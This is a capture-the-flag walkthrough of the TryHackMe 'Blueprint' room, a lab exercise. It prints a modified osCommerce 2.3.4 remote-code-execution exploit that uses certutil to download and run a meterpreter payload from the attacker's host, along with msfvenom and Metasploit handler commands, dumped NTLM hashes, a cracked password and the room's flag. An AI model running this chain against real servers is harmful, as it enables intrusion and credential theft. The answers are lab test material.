In this walk through, we will be going through the Blueprint room from Tryhackme. This room is rated as Easy on the platform and the objective is to hack into this Windows machine and escalate our privileges to Administrator to capture the root flag. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Blueprint |
IPaddress | 10.10.209.244 |
Difficulty | Easy |
Objective | Hack into this Windows machine and escalate your privileges to Administrator. |
Enumeration:
- I started off with a regular nmap scan with service version detection and found multiple ports opened as it is a Windows machine. Some of the interesting ports were – 80, 8080, 443 (HTTP/HTTPS), 139 and 445 (SMB) and 3306 (MySQL).
sudo nmap -sS -sV 10.10.209.244
- Enumerated the web server running on port 80 and found a 404 error there.
- Next, i pivot to port 443 and it has a directory listing enabled where we found out that oscommerce 2.3.4 is being installed on the server.
- We can access the same on port 8080.
- Next, i moved to SMB for enumeration,found a couple of shares however was unable to access them as per smbmap.
smbclient -L 10.10.209.244
smbmap -H 10.10.209.244
- Fired gobuster on the oscommerce installation and found bunch of interesting directories.
wh1terose@fsociety:~$ gobuster dir -u http://10.10.209.244:8080/oscommerce-2.3.4/catalog/ -w ~/Desktop/Wordlist/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.209.244:8080/oscommerce-2.3.4/catalog/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2023/11/29 12:41:49 Starting gobuster in directory enumeration mode =============================================================== /.htaccess (Status: 403) [Size: 1046] /.hta (Status: 403) [Size: 1046] /.htpasswd (Status: 403) [Size: 1046] /ADMIN (Status: 301) [Size: 371] [--> /Admin (Status: 301) [Size: 371] [--> /Images /admin /download /ext /images /install (Status: 301) [Size: 373] [--> /pub (Status: 301) [Size: 369] [--> -- snipped -- =============================================================== 2023/11/29 12:44:14 Finished ===============================================================
- Next, searched the oscommerce version for known exploits using searchsploit and found a RCE exploit.
searchsploit oscommerce 2.3.4
Initial Access:
- Copied the exploit to my working directory.
searchsploit -m php/webapps/44374.py
- Changed the target and base URL in the exploit and executed it. However, the system function was disabled for the security reasons.
python 44374.py
- So, i generated a Windows meterpreter payload using msfvenom named shell.exe. The idea is to download the payload directly on the server using certutil and execute it using the configure.php to get a shell back.
wh1terose@fsociety:~/CTF/TryHackme/Blueprint$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.1.78 LPORT=4444 -f exe -o shell.exe Running the 'init' command for the database: Existing database found, attempting to start it Starting database at /home/wh1terose/.msf4/db...pg_ctl: another server might be running; trying to start server anyway server starting success [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes Final size of exe file: 73802 bytes Saved as: shell.exe
- Made changes to the exploit as per new payload.
import requests # enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4) base_url = "http://10.10.209.244:8080/oscommerce-2.3.4/catalog/" target_url = "http://10.10.209.244:8080/oscommerce-2.3.4/catalog/install/install.php?step=4" data = { 'DIR_FS_DOCUMENT_ROOT': './' } # the payload will be injected into the configuration file via this code # ' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" . # so the format for the exploit will be: '); PAYLOAD; /* payload = '\');' payload += '$var = shell_exec("cmd.exe /C certutil -urlcache -split -f http://10.18.1.78:8000/shell.exe shell.exe & shell.exe");' # this is where you enter you PHP payload payload += 'echo $var;' payload += '/*' data['DB_DATABASE'] = payload # exploit it r = requests.post(url=target_url, data=data) if r.status_code == 200: print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php") else: print("[-] Exploit did not execute as planned") print("[-] Exploit did not execute as planned")```
- I spin up a webserver hosting our payload and executed our payload. Once i executed the configure.php file, i received a connection back at my Metasploit multi handler with admin privileges.
wh1terose@fsociety:~$ msfconsole -q [*] Starting persistent handler(s)... msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 10.18.1.78 LHOST => 10.18.1.78 msf6 exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf6 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 10.18.1.78:4444 [*] Sending stage (175686 bytes) to 10.10.209.244 [*] Meterpreter session 1 opened (10.18.1.78:4444 -> 10.10.209.244:49477) at 2023-11-29 13:29:53 +0530 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >
Getting Flags:
- As per the flag requirement, i dumped the users hash using hashdump and cracked the NTLM hash of user “Lab” using Crackstation. Found the password – googleplus.
meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::
- Finally dumped the root flag and completed the room.
Task 1 – Blueprint
Question 1 – “Lab” user NTLM hash decrypted
googleplus
Question 2 – root.txt
THM{aea1e3ce6fe7f89e10cea833ae009bee}
Also Read: Tryhackme – 0day
Conclusion:
So that was “Blueprint” for you. We first started with a nmap scan with service version detection flag set and found many ports opened – 80, 8080, 443 (HTTP/HTTPS), 139 and 445 (SMB) and 3306 (MySQL). Next, enumerated the web server on ports 80, 443 and 8080. Found an OS commerce installation. Looked for the known exploits for the os commerce version 2.3.4 and found a RCE exploit. Next, generated a meterpreter payload using msfvenom and used the exploit to upload and execute it on the server giving us a shell back at our handler with root permissions. At last, dumped and cracked the hashes and captured the root flag to complete the room and my first night after marriage. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.